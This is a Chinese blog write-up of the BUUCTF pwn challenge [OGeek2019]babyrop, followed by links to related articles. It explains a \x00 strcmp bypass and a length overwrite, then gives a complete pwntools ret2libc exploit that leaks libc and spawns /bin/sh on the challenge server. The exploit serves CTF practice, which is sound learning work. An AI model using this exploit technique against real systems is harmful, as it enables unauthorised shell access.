关于buuctf[OGeek2019]babyrop 1的一些些小结

最新推荐文章于 2023-05-06 11:37:08 发布
最新推荐文章于 2023-05-06 11:37:08 发布
阅读量642 收藏 2
点赞数
分类专栏: 二进制pwn学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Probeginner/article/details/121539716
版权

首先对于题目分析:

正常的32位小端序,checksec一下发现开了NX…………算了直接进正题。1.open函数的返回值,如果执行成功,他将返回一个文件描述,如果失败,他将返回-1.这里显然是成功了
2.文件描述符:0,1,2:是标准I/O输入、输出、错误。这里open执行成功了会返回3。
3.此时read(fd,&buf,4u)的意思是把fd指向的那个随机数输入buf中。
在这里插入图片描述
这里需要注意的是:strcmp函数可用“\x00”来截断,进而覆盖下面的v5变量,随后让
在这里插入图片描述
第二个read函数读入的“a1”足够覆盖栈,构造ROP。

EXP:

```python
from os import system
from pwn import*
from LibcSearcher import*
#context.log_level='debug'
p=remote('node4.buuoj.cn',27422)
elf= ELF('./pwn')
write_plt = elf.plt['write']
write_got = elf.got['write']
payload1 = '\x00' + '\xff'*7
p.sendline(payload1)
p.recv()#这里尤其需要注意,当发送第一行字符时,程序本身会输出一次需要先接受了。
paylaod2 = 'a'*(0xe7+4) +p32(write_plt) +p32(0x8048825) +p32(1) +p32(write_got)+p32(8)
p.sendline(paylaod2)
write_addr_ = u32(p.recv(4))
libc = ELF('./libc-2.23.so')
base_ = write_addr_ - libc.symbols['write']
system_ = base_ + libc.symbols['system']
binsh = base_ + libc.search('/bin/sh').next()
p.sendline(payload1)
p.recv()
paylaod = 'a'*0xeb + p32(system_)*2 + p32(binsh)
p.sendline(paylaod)
p.interactive()

这是对于LibcSearcher的一种使用方法,因为BUU上面给出了使用的libc库版本,另一种法子参照这位师傅的wp:LibcSearcher另一种解法

Hvf0x
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
关于C++知识点的一些小结
07-13
该文档是本人学习c++过程中整理的一些常用的个人认为还算重要的知识点,由于容易忘记,特以文档的形式呈现,一方面比便于自己巩固知识,另一方面也可以共享,如有纰漏或错误,请不吝赐教。
writeUP-[OGeek2019]babyrop 1
weixin_52111404的博客
08-12 528
本题之前做过类似题型,在此主要记录使用LibcSearcher时遇到的问题。
OGeek2019bayrop
m0_62322730的博客
05-06 338
OGeek2019bayrop
BUUCTF|PWN-[OGeek2019]babyrop1-WP
l2645470582_的博客
01-12 2232
1.检查保护机制 (1)该文件是32位文件 (2)开启堆栈不可执行 2.用32位IDA打开该文件
[OGeek2019]babyrop
Dem1的博客
05-08 145
题目分析 1.checksec 发现只开了NX保护,32位文件 2.IDA打开 (1)看main函数伪代码 由于有sub_80486BB(初始化缓存区函数),所以buf是个随机数 (2)看其他函数伪代码 ①函数中有个字符串比较要绕过,所以要使v10 ②已知strlen函数的缺陷使遇到\x00直接截断,所以可得输入的第一位数应为\x00 ③已知buf[7],且函数中有read(0,buf,0x20u),此外经计算可得(?)v5buf的第8位,所以可得v5可以被指定 ④已知a1v5,buf为[ebp-E7
buuctf-[OGeek2019]babyrop
weixin_44864859的博客
04-09 2190
查看主函数 int __cdecl main() { int buf; // [esp+4h] [ebp-14h] char v2; // [esp+Bh] [ebp-Dh] int fd; // [esp+Ch] [ebp-Ch] sub_80486BB(); fd = open("/dev/urandom", 0); if ( fd > 0 ) read...
BUUCTF [OGeek2019]babyrop
红叶的博客
10-30 618
不知道为什么远程进不去,后来选择了不用LibcSearcher,用题目提供的Libc进去了。分析完反汇编成C语言的程序源码后,就是常规的ret2libc了。由于本题是32位ELF,因此不需要rdi与ret栈对齐。思路有了,接下来是构造PoC与Payload。strlen 遇到 \x00会截断。使用puts函数进行泄露真实地址。成功本地获取shell。首先绕过 strlen。
2020-11-11
weixin_52232741的博客
11-11 164
Python文件操作函数 1.Read()函数 函数说明 Read from stream. 函数语法 read(size=-1, /),返回值为str f.read() #全部读取 f.read(100) #读取100个字符 2.Readline()函数 函数说明 Read from stream until newline or EOF. 函数语法 readline(size=-1, /),返回值为str f.readline() #读取一行数据 3. Write()函数 函数说明 Write
【Writeup】BUUCTF_Pwn_[OGeek2019]babyrop
BAKUMANSEC - Just Do It
09-03 2632
0x01 解题思路 文件基本信息 IDA查看   读取一个随机数,然后与用户输入作比较,需要绕过。strlen遇到**\x00会停止,因此只要开头为\x00,最终比较的长度v1就是0,从而绕过strncmp。   这里read的第三个读取长度参数实际上是前一个函数的返回值,可以通过上一次输入覆盖为\xff**,然后就可以利用栈溢出进行常规ROP了。 0x02 EXP #!/usr/...
javascript 一些用法小结
10-29
JavaScript的一些用法总结
IE与firefox下Dhtml的一些区别小结
12-10
1.DOM上的接口基本上还是一致的,但经测试发现mozilla下的DOM更标准些,就算些法一样,IE下会有一些微小的区别,但无关要紧 2.事件模型上,这方面区别算比较大. mozilla下的e.target 相当于 ie下的event.srcElement,...
awk基础知识小结第1/2页
01-11
1、使用规则 awk 适合于文本处理和报表生成,它还有许多精心设计的特性,允许进行需要特殊技巧程序设计。awk 的语法较为常见。它借鉴了某些语言的一些精华部分,如C 语言、python 和 bash。 第一个 awk让我们继续,...
关于swift的个人小结
08-31
本文是个人对于目前学习swift的一些心得的汇总,这里分享给大家,希望大家能够喜欢
BUUCTF pwn——[OGeek2019]babyrop
CNS-Enterprise BCC-1701-J
04-02 229
BUUCTF 做题练习
BUUCTF--[OGeek2019]babyrop
N1rvana的博客
11-14 3445
才学习了基本的ROP流程,到处找题练,不过也没做出来几道题,以这道32位的题作为例题吧。 这道题是BUUCTF上pwn练习题里的[OGeek2019]babyrop。 代码审计 老规矩先checksec一下: 没有canary保护,nx保护开启排除shellcode可能性,FULL RELEO为地址随机化。 观察主函数,先设定了一个闹铃,到时间就会强制退出程序,解除闹铃的方法在上一篇博客中提到过了, 这道题中闹铃函数依然对我们解题起不到什么干扰作用。 主函数的思路大概是:生成一个随机数,把这个随机数作为
picoctf_2018_buffer overflow 2&&wustctf2020_getshell&&[BJDCTF 2nd]snake_dyn&&ciscn_2019_es_7[rsop]
、moddemod
07-22 409
picoctf_2018_buffer overflow 2 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_2' p = process(proc_name) p = remote('node3.buuoj.cn', 28375) elf =
[BUUCTF]PWN7——[OGeek2019]babyrop
mcmuyanga的博客
08-25 1198
[BUUCTF]PWN7——[OGeek2019]babyrop 题目网址:https://buuoj.cn/challenges#[OGeek2019]babyrop 步骤: 例行检查,32位,开启了RELRO(对got表不可以写)和NX(堆栈不可执行) nc的时候没有什么回显,用32位ida打开附件,shift+f12查看程序里的字符串,没有发现system和/bin/sh 从main函数开始看程序 用户输入一个字符串给buf,然后跟随机数比较大小,strncmp里的比较长度的参数v1是我们输入
基于STM32F103的电子时钟实验小结1
最新发布
06-12
很高兴能回答你的问题。关于基于STM32F103的电子时钟实验小结,我可以给你一些简要的总结。 首先,STM32F103是一款非常强大的微控制器,具有较高的性能和可靠性。在电子时钟的应用中,它可以实现时间的精确计时和显示。 在实验中,我们可以通过外部晶振或内部RC振荡器来提供时钟信号,从而实现对时间的计时和管理。同时,我们还可以利用STM32F103的GPIO口来实现对LED数码管等显示器件的控制,以显示当前时间。 在具体实现中,我们可以通过编程来控制STM32F103的各个模块,包括时钟模块、GPIO模块、定时器模块等。同时,我们还可以利用各种编程语言和软件工具来进行开发和调试,例如Keil、ST-LINK、CubeMX等。 总的来说,基于STM32F103的电子时钟实验可以帮助我们更好地了解微控制器的应用和原理,同时也可以提高我们的编程和电路设计能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值